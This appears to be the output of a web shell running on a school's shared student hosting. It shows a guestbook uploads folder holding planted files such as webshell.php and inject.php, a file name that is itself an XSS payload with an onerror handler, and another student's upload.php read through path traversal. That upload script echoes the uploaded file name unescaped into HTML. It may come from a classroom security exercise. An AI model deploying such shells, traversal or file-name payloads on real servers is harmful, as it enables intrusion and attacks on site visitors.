WEB SHELL ACTIVATED
File Browser
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png
..
003b15869ae62d2ceeee451a5f652dd6.png
0tk5j14v024b1.jpg
300px-Cursed_Cat.jpg
32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg
Bill-Gates-Paul-Allen-2013.jpg
CV Jasper Kramp.png
Cat profile.png
Fronalpstock_big.jpg
Krik en las.jpg
Krik.jpg
Pino-dood-03.jpg
Shellz.php
Ted_Kaczynski_2_(cropped).jpg
Tux.svg.png
Z.png
android.jpg
apple.php
cianancatfish.jpg
downloads (1).jpeg
downloads.jpeg
epresso.jpg
fake_photo.png
hand.jpg
https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg
image.png
images.jpeg
info.php
inject.php
instant_redirect.jpg
japper.jpg
koekiemonster-3.jpg
logo.png
muis.jpg
people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg
picobellobv.jpeg
redirect.php
rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg
sdfsa.png
sneaky.svg
taylor.webp
test.html
testpreg.php
testpreg1.php
testtest.php.JPG
ultimate_attack.gif
ultimate_attack.php
ultimate_attack.svg
wallpaper.jpg
webshell.php
Viewing: ./../../../../586387.klas4s23.mid-ica.nl/public_html/website/upload.php
<?php
// Handle only POST requests that carry an "image" file upload.
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["image"])) {
    $target_dir = "uploads/";
    // The stored name is the client-supplied filename (directory part stripped by basename()).
    $target_file = $target_dir . basename($_FILES["image"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    // getimagesize() returns false when the file has no recognisable image header.
    $check = getimagesize($_FILES["image"]["tmp_name"]);
    if ($check === false) {
        echo "Het bestand is geen afbeelding.";
        $uploadOk = 0;
    }
    // Reject files larger than 5,000,000 bytes.
    if ($_FILES["image"]["size"] > 5000000) {
        echo "Sorry, het bestand is te groot.";
        $uploadOk = 0;
    }
    // Allow only the jpg, jpeg, png and gif extensions.
    if ($imageFileType != "jpg" && $imageFileType != "jpeg" && $imageFileType != "png" && $imageFileType != "gif") {
        echo "Sorry, alleen JPG, JPEG, PNG en GIF bestanden zijn toegestaan.";
        $uploadOk = 0;
    }
    if ($uploadOk) {
        if (move_uploaded_file($_FILES["image"]["tmp_name"], $target_file)) {
            // The stored path, including the client-supplied name, is written into the src attribute without escaping.
            echo '<div style="width: 300px; height: 300px; overflow: hidden;">';
            echo '<img src="' . $target_file . '" alt="Geüploade afbeelding" style="width: 100%; height: auto;">';
            echo '</div>';
        } else {
            echo "Sorry, er was een probleem met het uploaden van het bestand.";
        }
    }
}
?>
🎯 Available Actions
⚠️ Educational Warning: This demonstrates a web shell vulnerability.
In a real attack, this could allow complete server compromise!